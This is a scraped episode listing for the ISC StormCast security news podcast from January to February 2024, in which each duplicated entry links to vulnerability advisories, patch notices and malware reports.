Computer viruses are celebrating their 40th birthday (well, 54th, really) https://isc.sans.edu/diary/Computer%20viruses%20are%20celebrating%20their%2040th%20birthday%20%28well%2C%2054th%2C%20really%29/30624 Three million malware-infected smart toothbrushes used in Swiss DDoS attacks https://www.tomshardware.com/networking/three-million-malware-infected-smart-toothbrushes-used-in-swiss-ddos-attacks-botnet-causes-millions-of-euros-in-damages Critical Security Issue Affecting TeamCity On-Premises CVE-2024-23917 https://blog.jetbrains.com/teamcity/2024/02/critical-security-issue-affecting-teamcity-on-premises-cve-2024-23917/ Resume Looters https://www.group-ib.com/blog/resumelooters/ Facebook Advertising Spreads Novel Malware Variant https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/FaceBook_Ad_Spreads_Novel_Malware.pdf
2/7/20246 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, February 7th, 2024

Computer viruses are celebrating their 40th birthday (well, 54th, really) https://isc.sans.edu/diary/Computer%20viruses%20are%20celebrating%20their%2040th%20birthday%20%28well%2C%2054th%2C%20really%29/30624 Three million malware-infected smart toothbrushes used in Swiss DDoS attacks https://www.tomshardware.com/networking/three-million-malware-infected-smart-toothbrushes-used-in-swiss-ddos-attacks-botnet-causes-millions-of-euros-in-damages Critical Security Issue Affecting TeamCity On-Premises CVE-2024-23917 https://blog.jetbrains.com/teamcity/2024/02/critical-security-issue-affecting-teamcity-on-premises-cve-2024-23917/ Resume Looters https://www.group-ib.com/blog/resumelooters/ Facebook Advertising Spreads Novel Malware Variant https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/FaceBook_Ad_Spreads_Novel_Malware.pdf
2/7/20246 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, February 6th, 2024

Public Information and Email Spam https://isc.sans.edu/diary/Public+Information+and+Email+Spam/30620/ Anydesk Update https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/ https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-213655-1032.pdf Ivanti POC For CVE-2024-21893 https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis Deepfake Exploits https://www.scmp.com/news/hong-kong/law-and-crime/article/3250851/everyone-looked-real-multinational-firms-hong-kong-office-loses-hk200-million-after-scammers-stage https://www.404media.co/inside-the-underground-site-where-ai-neural-networks-churns-out-fake-ids-onlyfake/
2/6/20245 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, February 6th, 2024

Public Information and Email Spam https://isc.sans.edu/diary/Public+Information+and+Email+Spam/30620/ Anydesk Update https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/ https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-213655-1032.pdf Ivanti POC For CVE-2024-21893 https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis Deepfake Exploits https://www.scmp.com/news/hong-kong/law-and-crime/article/3250851/everyone-looked-real-multinational-firms-hong-kong-office-loses-hk200-million-after-scammers-stage https://www.404media.co/inside-the-underground-site-where-ai-neural-networks-churns-out-fake-ids-onlyfake/
2/6/20245 minutes, 54 seconds
Episode Artwork

ISC StormCast for Monday, February 5th, 2024

DShield Sensor Log Collection with Elasticsearch https://isc.sans.edu/forums/diary/DShield%20Sensor%20Log%20Collection%20with%20Elasticsearch/30616/ Anydesk Breach https://anydesk.com/en/public-statement Leaky Vessels https://snyk.io/blog/leaky-vessels-docker-runc-container-breakout-vulnerabilities/
2/5/20245 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, February 5th, 2024

DShield Sensor Log Collection with Elasticsearch https://isc.sans.edu/forums/diary/DShield%20Sensor%20Log%20Collection%20with%20Elasticsearch/30616/ Anydesk Breach https://anydesk.com/en/public-statement Leaky Vessels https://snyk.io/blog/leaky-vessels-docker-runc-container-breakout-vulnerabilities/
2/5/20245 minutes, 45 seconds
Episode Artwork

ISC StormCast for Friday, February 2nd, 2024

What is a Top Level Domain https://isc.sans.edu/forums/diary/What%20is%20a%20%22Top%20Level%20Domain%22%3F/30612/ Updated CISA Ivanti Policy https://www.cisa.gov/news-events/directives/supplemental-direction-v1-ed-24-01-mitigate-ivanti-connect-secure-and-ivanti-policy-secure Cloudflare Publishes Breach Details https://blog.cloudflare.com/thanksgiving-2023-security-incident Vision Pro Update https://support.apple.com/en-us/HT214070
2/2/20247 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, February 2nd, 2024

What is a Top Level Domain https://isc.sans.edu/forums/diary/What%20is%20a%20%22Top%20Level%20Domain%22%3F/30612/ Updated CISA Ivanti Policy https://www.cisa.gov/news-events/directives/supplemental-direction-v1-ed-24-01-mitigate-ivanti-connect-secure-and-ivanti-policy-secure Cloudflare Publishes Breach Details https://blog.cloudflare.com/thanksgiving-2023-security-incident Vision Pro Update https://support.apple.com/en-us/HT214070
2/2/20247 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, February 1st, 2024

The Fun and Dangers of Top Level Domains (TLDs) https://isc.sans.edu/diary/The%20Fun%20and%20Dangers%20of%20Top%20Level%20Domains%20%28TLDs%29/30608 Ivanti Releases Patches and New Vulnerabilities https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US glibc syslog() vulnerablity https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt modsecurity WAF bypass https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30
2/1/20245 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, February 1st, 2024

The Fun and Dangers of Top Level Domains (TLDs) https://isc.sans.edu/diary/The%20Fun%20and%20Dangers%20of%20Top%20Level%20Domains%20%28TLDs%29/30608 Ivanti Releases Patches and New Vulnerabilities https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US glibc syslog() vulnerablity https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt modsecurity WAF bypass https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30
2/1/20245 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, January 31st, 2024

What did I say to make you stop talking to me https://isc.sans.edu/diary/What%20did%20I%20say%20to%20make%20you%20stop%20talking%20to%20me%3F/30604 Identification of a top-level domain for private use https://itp.cdn.icann.org/en/files/root-system/identification-tld-private-use-24-01-2024-en.pdf Juniper Patches Patching https://supportportal.juniper.net/s/article/2024-01-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-have-been-addressed?language=en_US https://www.theregister.com/2024/01/30/juniper_networks_vulnerabilities/ Chat GPT Leaking Conversations Again https://arstechnica.com/security/2024/01/ars-reader-reports-chatgpt-is-sending-him-conversations-from-unrelated-ai-users/
1/31/20246 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, January 31st, 2024

What did I say to make you stop talking to me https://isc.sans.edu/diary/What%20did%20I%20say%20to%20make%20you%20stop%20talking%20to%20me%3F/30604 Identification of a top-level domain for private use https://itp.cdn.icann.org/en/files/root-system/identification-tld-private-use-24-01-2024-en.pdf Juniper Patches Patching https://supportportal.juniper.net/s/article/2024-01-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-have-been-addressed?language=en_US https://www.theregister.com/2024/01/30/juniper_networks_vulnerabilities/ Chat GPT Leaking Conversations Again https://arstechnica.com/security/2024/01/ars-reader-reports-chatgpt-is-sending-him-conversations-from-unrelated-ai-users/
1/31/20246 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, January 30th, 2024

Exploit Flare Up Against Older Atlassian Confluence Vulnerability https://isc.sans.edu/diary/Exploit%20Flare%20Up%20Against%20Older%20Altassian%20Confluence%20Vulnerability/30600 Malicious Python Packages install Infostealer https://www.fortinet.com/blog/threat-research/info-stealing-packages-hidden-in-pypi Linux ICMPv6 Router Adv. RCE https://access.redhat.com/security/cve/cve-2023-6200
1/30/20245 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, January 30th, 2024

Exploit Flare Up Against Older Atlassian Confluence Vulnerability https://isc.sans.edu/diary/Exploit%20Flare%20Up%20Against%20Older%20Altassian%20Confluence%20Vulnerability/30600 Malicious Python Packages install Infostealer https://www.fortinet.com/blog/threat-research/info-stealing-packages-hidden-in-pypi Linux ICMPv6 Router Adv. RCE https://access.redhat.com/security/cve/cve-2023-6200
1/30/20245 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, January 29th, 2024

A Batch File With Multiple Payloads https://isc.sans.edu/diary/A%20Batch%20File%20With%20Multiple%20Payloads/30592 fritz.box domain used to advertise NFTs https://www.heise.de/news/Verwirrend-Internet-Domain-fritz-box-zeigt-NFT-Galerie-statt-Router-Verwaltung-9610149.html Jenkins CVE-2024-23897 PoC https://github.com/gquere/pwn_jenkins/blob/master/README.md#jenkins-cli-arbitrary-read-cve-2024-23897-applies-to-versions-below-2442-and-lts-24263 Malicious Google Ads Target Chinese Users https://www.malwarebytes.com/blog/threat-intelligence/2024/01/malicious-ads-for-restricted-messaging-applications-target-chinese-users
1/29/20247 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, January 29th, 2024

A Batch File With Multiple Payloads https://isc.sans.edu/diary/A%20Batch%20File%20With%20Multiple%20Payloads/30592 fritz.box domain used to advertise NFTs https://www.heise.de/news/Verwirrend-Internet-Domain-fritz-box-zeigt-NFT-Galerie-statt-Router-Verwaltung-9610149.html Jenkins CVE-2024-23897 PoC https://github.com/gquere/pwn_jenkins/blob/master/README.md#jenkins-cli-arbitrary-read-cve-2024-23897-applies-to-versions-below-2442-and-lts-24263 Malicious Google Ads Target Chinese Users https://www.malwarebytes.com/blog/threat-intelligence/2024/01/malicious-ads-for-restricted-messaging-applications-target-chinese-users
1/29/20247 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, January 26th, 2024

Fecebook AdsManager Targeted by a Python Infostealer https://isc.sans.edu/diary/Facebook%20AdsManager%20Targeted%20by%20a%20Python%20Infostealer/30590 Privacy Concerns about Apple Push Notifications https://twitter.com/mysk_co/status/1750502700112916504 https://www.youtube.com/watch?v=4ZPTjGG9t7s Inside a Global Phone Spy Tool Monitoring Billions https://www.404media.co/inside-global-phone-spy-tool-patternz-nuviad-real-time-bidding/
1/26/20246 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, January 26th, 2024

Fecebook AdsManager Targeted by a Python Infostealer https://isc.sans.edu/diary/Facebook%20AdsManager%20Targeted%20by%20a%20Python%20Infostealer/30590 Privacy Concerns about Apple Push Notifications https://twitter.com/mysk_co/status/1750502700112916504 https://www.youtube.com/watch?v=4ZPTjGG9t7s Inside a Global Phone Spy Tool Monitoring Billions https://www.404media.co/inside-global-phone-spy-tool-patternz-nuviad-real-time-bidding/
1/26/20246 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, January 25th, 2024

How Bad User Interfaces Make Security Tools Harmful https://isc.sans.edu/diary/How%20Bad%20User%20Interfaces%20Make%20Security%20Tools%20Harmful/30586 Sys:All Loophole Alloed Us to Penetrate GKE Clusters in Production https://orca.security/resources/blog/sys-all-google-kubernetes-engine-risk-example/ Automotive Pwn2Own https://www.zerodayinitiative.com/blog/2024/1/23/pwn2own-automotive-2024-the-full-schedule Android Keystroke Injection Vulnerability Exploit https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/ CVE-2024-0769 D-Link DIR-859 https://securityonline.info/cve-2024-0769-the-vulnerability-d-link-wont-fix-in-dir-859-router/ SANS.edu Dean's List https://www.sans.edu/students/awards
1/25/20245 minutes, 29 seconds
Episode Artwork

ISC StormCast for Thursday, January 25th, 2024

How Bad User Interfaces Make Security Tools Harmful https://isc.sans.edu/diary/How%20Bad%20User%20Interfaces%20Make%20Security%20Tools%20Harmful/30586 Sys:All Loophole Alloed Us to Penetrate GKE Clusters in Production https://orca.security/resources/blog/sys-all-google-kubernetes-engine-risk-example/ Automotive Pwn2Own https://www.zerodayinitiative.com/blog/2024/1/23/pwn2own-automotive-2024-the-full-schedule Android Keystroke Injection Vulnerability Exploit https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/ CVE-2024-0769 D-Link DIR-859 https://securityonline.info/cve-2024-0769-the-vulnerability-d-link-wont-fix-in-dir-859-router/ SANS.edu Dean's List https://www.sans.edu/students/awards
1/25/20245 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, January 24th, 2024

Update on Atlassian Exploit Activity https://isc.sans.edu/forums/diary/Update%20on%20Atlassian%20Exploit%20Activity%20/30582/ POC For Fortra GoAnywhere MFT Authentication Bypass CVE-2024-0204 https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/ Baracuda Web Application Firewall https://campus.barracuda.com/product/webapplicationfirewall/doc/102888530/security-advisory/ GitGot: GitHub leveraged by cybercriminals to store stolen data https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data
1/24/20245 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, January 24th, 2024

Update on Atlassian Exploit Activity https://isc.sans.edu/forums/diary/Update%20on%20Atlassian%20Exploit%20Activity%20/30582/ POC For Fortra GoAnywhere MFT Authentication Bypass CVE-2024-0204 https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/ Baracuda Web Application Firewall https://campus.barracuda.com/product/webapplicationfirewall/doc/102888530/security-advisory/ GitGot: GitHub leveraged by cybercriminals to store stolen data https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data
1/24/20245 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, January 23rd, 2024

Apple Updates Everything https://isc.sans.edu/forums/diary/Apple%20Updates%20Everything%20-%20New%200%20Day%20in%20WebKit/30578/ Atlassian Confluence RCE Vulnerability Exploits CVE-2023-22527 https://isc.sans.edu/forums/diary/Scans%20Exploit%20Attempts%20for%20Atlassian%20Confluence%20RCE%20Vulnerability%20CVE-2023-22527/30576/ Updated Ivanti Mitigation Advise https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US Czech Republic Sets IPv6 Shutdown date https://konecipv4.cz/en/
1/23/20247 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, January 23rd, 2024

Apple Updates Everything https://isc.sans.edu/forums/diary/Apple%20Updates%20Everything%20-%20New%200%20Day%20in%20WebKit/30578/ Atlassian Confluence RCE Vulnerability Exploits CVE-2023-22527 https://isc.sans.edu/forums/diary/Scans%20Exploit%20Attempts%20for%20Atlassian%20Confluence%20RCE%20Vulnerability%20CVE-2023-22527/30576/ Updated Ivanti Mitigation Advise https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US Czech Republic Sets IPv4 Shutdown date https://konecipv4.cz/en/
1/23/20247 minutes, 17 seconds
Episode Artwork

ISC StormCast for Monday, January 22nd, 2024

macOS Python Script Replacing Walling Applications with Rogue Apps https://isc.sans.edu/diary/macOS%20Python%20Script%20Replacing%20Wallet%20Applications%20with%20Rogue%20Apps/30572 Microsoft Breach https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/ Juniper Vulnerabilities https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/ Brave Removing Strict Fingerprint Mode https://brave.com/privacy-updates/28-sunsetting-strict-fingerprinting-mode/
1/22/20246 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, January 22nd, 2024

macOS Python Script Replacing Walling Applications with Rogue Apps https://isc.sans.edu/diary/macOS%20Python%20Script%20Replacing%20Wallet%20Applications%20with%20Rogue%20Apps/30572 Microsoft Breach https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/ Juniper Vulnerabilities https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/ Brave Removing Strict Fingerprint Mode https://brave.com/privacy-updates/28-sunsetting-strict-fingerprinting-mode/
1/22/20246 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, January 19th, 2024

More Scans for Ivanti Connect "Secure" VPN. Exploits Public https://isc.sans.edu/diary/More%20Scans%20for%20Ivanti%20Connect%20%22Secure%22%20VPN.%20Exploits%20Public/30568 Ivanti Endpoint Manager Mobile / MobileIron Core Vuln exploited CVE-2023-35082 https://www.cisa.gov/known-exploited-vulnerabilities-catalog Attacks against Exposed Databases https://twitter.com/fasterthanlime/status/1741935393413402739 Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
1/19/20246 minutes, 38 seconds
Episode Artwork

ISC StormCast for Friday, January 19th, 2024

More Scans for Ivanti Connect "Secure" VPN. Exploits Public https://isc.sans.edu/diary/More%20Scans%20for%20Ivanti%20Connect%20%22Secure%22%20VPN.%20Exploits%20Public/30568 Ivanti Endpoint Manager Mobile / MobileIron Core Vuln exploited CVE-2023-35082 https://www.cisa.gov/known-exploited-vulnerabilities-catalog Attacks against Exposed Databases https://twitter.com/fasterthanlime/status/1741935393413402739 Outlook Vulnerability Discovery and New Ways to Leak NTLM Hashes https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
1/19/20246 minutes, 38 seconds
Episode Artwork

ISC StormCast for Thursday, January 18th, 2024

Number Usage in Passwords https://isc.sans.edu/diary/Number%20Usage%20in%20Passwords/30540 A Lightweight Method to Detect Potential iOS Malware https://securelist.com/shutdown-log-lightweight-ios-malware-detection-method/111734/ CISA and FBI Release Known IOCs Associated with Androxgh0st Malware https://www.cisa.gov/news-events/alerts/2024/01/16/cisa-and-fbi-release-known-iocs-associated-androxgh0st-malware
1/18/20246 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, January 18th, 2024

Number Usage in Passwords https://isc.sans.edu/diary/Number%20Usage%20in%20Passwords/30540 A Lightweight Method to Detect Potential iOS Malware https://securelist.com/shutdown-log-lightweight-ios-malware-detection-method/111734/ CISA and FBI Release Known IOCs Associated with Androxgh0st Malware https://www.cisa.gov/news-events/alerts/2024/01/16/cisa-and-fbi-release-known-iocs-associated-androxgh0st-malware
1/18/20246 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, January 17th, 2024

Ivanti Vulnerability Widespread Scanning https://isc.sans.edu/diary/Scans%20for%20Ivanti%20Connect%20%22Secure%22%20VPN%20%20Vulnerability%20%28CVE-2023-46805%2C%20CVE-2024-21887%29/30562 https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/ Citrix Patches Already Exploited Vulnerability https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549 Atlassian Confluence Remote Code Execution Vulnerability https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html macOS Infostealers https://www.sentinelone.com/blog/the-many-faces-of-undetected-macos-infostealers-keysteal-atomic-cherrypie-continue-to-adapt/ Google Chrome 0-day https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html GitHub Key Rotation https://www.bleepingcomputer.com/news/security/github-rotates-keys-to-mitigate-impact-of-credential-exposing-flaw/
1/17/20245 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, January 17th, 2024

Ivanti Vulnerability Widespread Scanning https://isc.sans.edu/diary/Scans%20for%20Ivanti%20Connect%20%22Secure%22%20VPN%20%20Vulnerability%20%28CVE-2023-46805%2C%20CVE-2024-21887%29/30562 https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/ Citrix Patches Already Exploited Vulnerability https://support.citrix.com/article/CTX584986/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20236548-and-cve20236549 Atlassian Confluence Remote Code Execution Vulnerability https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html macOS Infostealers https://www.sentinelone.com/blog/the-many-faces-of-undetected-macos-infostealers-keysteal-atomic-cherrypie-continue-to-adapt/ Google Chrome 0-day https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html GitHub Key Rotation https://www.bleepingcomputer.com/news/security/github-rotates-keys-to-mitigate-impact-of-credential-exposing-flaw/
1/17/20245 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, January 16th, 2024

One File, Two Payloads https://isc.sans.edu/diary/One%20File%2C%20Two%20Payloads/30558 Ivanti Vulnerability Updates https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/ NVidia DGX H100 and A100 Updates https://nvidia.custhelp.com/app/answers/detail/a_id/5510 GitLab Vulnerability https://nvd.nist.gov/vuln/detail/CVE-2023-7028
1/16/20246 minutes
Episode Artwork

ISC StormCast for Tuesday, January 16th, 2024

One File, Two Payloads https://isc.sans.edu/diary/One%20File%2C%20Two%20Payloads/30558 Ivanti Vulnerability Updates https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/ NVidia DGX H100 and A100 Updates https://nvidia.custhelp.com/app/answers/detail/a_id/5510 GitLab Vulnerability https://nvd.nist.gov/vuln/detail/CVE-2023-7028
1/16/20246 minutes
Episode Artwork

ISC StormCast for Friday, January 12th, 2024

Timeline to Remove DSA Support in OpenSSH https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-January/000156.html Juniper Patches https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=%40sfcec_community_publish_date_formula__c%20descending&numberOfResults=50&f:ctype=[Security%20Advisories] ManageEngine ADSelfService Plus Patch CVE-2024-0252 https://www.manageengine.com/products/self-service-password/advisory/CVE-2024-0252.html Atomic Stealer for Mac Update https://www.malwarebytes.com/blog/threat-intelligence/2024/01/atomic-stealer-rings-in-the-new-year-with-updated-version
1/12/20245 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, January 12th, 2024

Timeline to Remove DSA Support in OpenSSH https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-January/000156.html Juniper Patches https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=%40sfcec_community_publish_date_formula__c%20descending&numberOfResults=50&f:ctype=[Security%20Advisories] ManageEngine ADSelfService Plus Patch CVE-2024-0252 https://www.manageengine.com/products/self-service-password/advisory/CVE-2024-0252.html Atomic Stealer for Mac Update https://www.malwarebytes.com/blog/threat-intelligence/2024/01/atomic-stealer-rings-in-the-new-year-with-updated-version
1/12/20245 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, January 11th, 2024

Jenkins Brute Force Scans https://isc.sans.edu/diary/Jenkins%20Brute%20Force%20Scans/30546 Ivanti Connect Security VPN Vulnerability Exploited https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/ Zoom Privilege Escalation Vulnerability https://www.zoom.com/en/trust/security-bulletin/ZSB-24001/ Apache Applictions Targeted by Stealthy Attacker https://blog.aquasec.com/threat-alert-apache-applications-targeted-by-stealthy-attacker Infosec Toolshed https://youtu.be/qDK1PQ1OZjk?si=_vTpHqlovD2Hjd4M
1/11/20245 minutes, 12 seconds
Episode Artwork

ISC StormCast for Thursday, January 11th, 2024

Jenkins Brute Force Scans https://isc.sans.edu/diary/Jenkins%20Brute%20Force%20Scans/30546 Ivanti Connect Security VPN Vulnerability Exploited https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/ Zoom Privilege Escalation Vulnerability https://www.zoom.com/en/trust/security-bulletin/ZSB-24001/ Apache Applictions Targeted by Stealthy Attacker https://blog.aquasec.com/threat-alert-apache-applications-targeted-by-stealthy-attacker Infosec Toolshed https://youtu.be/qDK1PQ1OZjk?si=_vTpHqlovD2Hjd4M
1/11/20245 minutes, 12 seconds
Episode Artwork

ISC StormCast for Wednesday, January 10th, 2024

Microsoft January 2024 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+January+2024+Patch+Tuesday/30548/ Adobe Vulnerabilities https://helpx.adobe.com/security/products/substance3d_stager/apsb24-06.html CVE-2023-50916: Authentication Coercion Vulnerablity in Kyocera Device Manager https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-50916-authentication-coercion-vulnerability-in-kyocera-device-manager/ Network Connected Wrenches Used in Factories can be hacked https://arstechnica.com/security/2024/01/network-connected-wrenches-used-in-factories-can-be-hacked-for-sabotage-or-ransomware/
1/10/20246 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, January 10th, 2024

Microsoft January 2024 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+January+2024+Patch+Tuesday/30548/ Adobe Vulnerabilities https://helpx.adobe.com/security/products/substance3d_stager/apsb24-06.html CVE-2023-50916: Authentication Coercion Vulnerablity in Kyocera Device Manager https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-50916-authentication-coercion-vulnerability-in-kyocera-device-manager/ Network Connected Wrenches Used in Factories can be hacked https://arstechnica.com/security/2024/01/network-connected-wrenches-used-in-factories-can-be-hacked-for-sabotage-or-ransomware/
1/10/20246 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, January 9th, 2024

What is That User Agent https://isc.sans.edu/diary/What%20is%20that%20User%20Agent%3F/30536 KyberSlash Vulnerability https://kyberslash.cr.yp.to/faq.html Netfilter DoS Vulnerability CVE-2024-0193 https://access.redhat.com/security/cve/CVE-2024-0193 Cacti Vulnerability https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp
1/9/20246 minutes, 5 seconds
Episode Artwork

ISC StormCast for Tuesday, January 9th, 2024

What is That User Agent https://isc.sans.edu/diary/What%20is%20that%20User%20Agent%3F/30536 KyberSlash Vulnerability https://kyberslash.cr.yp.to/faq.html Netfilter DoS Vulnerability CVE-2024-0193 https://access.redhat.com/security/cve/CVE-2024-0193 Cacti Vulnerability https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp
1/9/20246 minutes, 5 seconds
Episode Artwork

ISC StormCast for Monday, January 8th, 2024

Netstat But Better and in PowerShell https://isc.sans.edu/diary/Netstat%2C%20but%20Better%20and%20in%20PowerShell/30532 Double Phishing Submission https://isc.sans.edu/diary/Are%20you%20sure%20of%20your%20password%3F/30534 Suspicious Prometei Botnet Activity https://isc.sans.edu/diary/Suspicious%20Prometei%20Botnet%20Activity/30538 Spectral Blur Mac Malware https://g-les.github.io/yara/2024/01/03/100DaysofYARA_SpectralBlur.html Google Malware Abusing API is Standard Token Theft not an API Issue https://www.bleepingcomputer.com/news/security/google-malware-abusing-api-is-standard-token-theft-not-an-api-issue/
1/8/20245 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, January 8th, 2024

Netstat But Better and in PowerShell https://isc.sans.edu/diary/Netstat%2C%20but%20Better%20and%20in%20PowerShell/30532 Double Phishing Submission https://isc.sans.edu/diary/Are%20you%20sure%20of%20your%20password%3F/30534 Suspicious Prometei Botnet Activity https://isc.sans.edu/diary/Suspicious%20Prometei%20Botnet%20Activity/30538 Spectral Blur Mac Malware https://g-les.github.io/yara/2024/01/03/100DaysofYARA_SpectralBlur.html Google Malware Abusing API is Standard Token Theft not an API Issue https://www.bleepingcomputer.com/news/security/google-malware-abusing-api-is-standard-token-theft-not-an-api-issue/
1/8/20245 minutes, 8 seconds
Episode Artwork

ISC StormCast for Friday, January 5th, 2024

Wireshark Updates https://isc.sans.edu/diary/Wireshark%20updates/30528 Android Updates https://source.android.com/docs/security/bulletin/2024-01-01 Ivanti Critical Vulnerability https://forums.ivanti.com/s/article/SA-2023-12-19-CVE-2023-39336?language=en_US Malicious PyPi Packages https://www.fortinet.com/blog/threat-research/malicious-pypi-packages-deploy-coinminer-on-linux-devices Everything npm package https://www.bleepingcomputer.com/news/security/everything-blocks-devs-from-removing-their-own-npm-packages/
1/5/20245 minutes, 7 seconds
Episode Artwork

ISC StormCast for Friday, January 5th, 2024

Wireshark Updates https://isc.sans.edu/diary/Wireshark%20updates/30528 Android Updates https://source.android.com/docs/security/bulletin/2024-01-01 Ivanti Critical Vulnerability https://forums.ivanti.com/s/article/SA-2023-12-19-CVE-2023-39336?language=en_US Malicious PyPi Packages https://www.fortinet.com/blog/threat-research/malicious-pypi-packages-deploy-coinminer-on-linux-devices Everything npm package https://www.bleepingcomputer.com/news/security/everything-blocks-devs-from-removing-their-own-npm-packages/
1/5/20245 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, January 4th, 2024

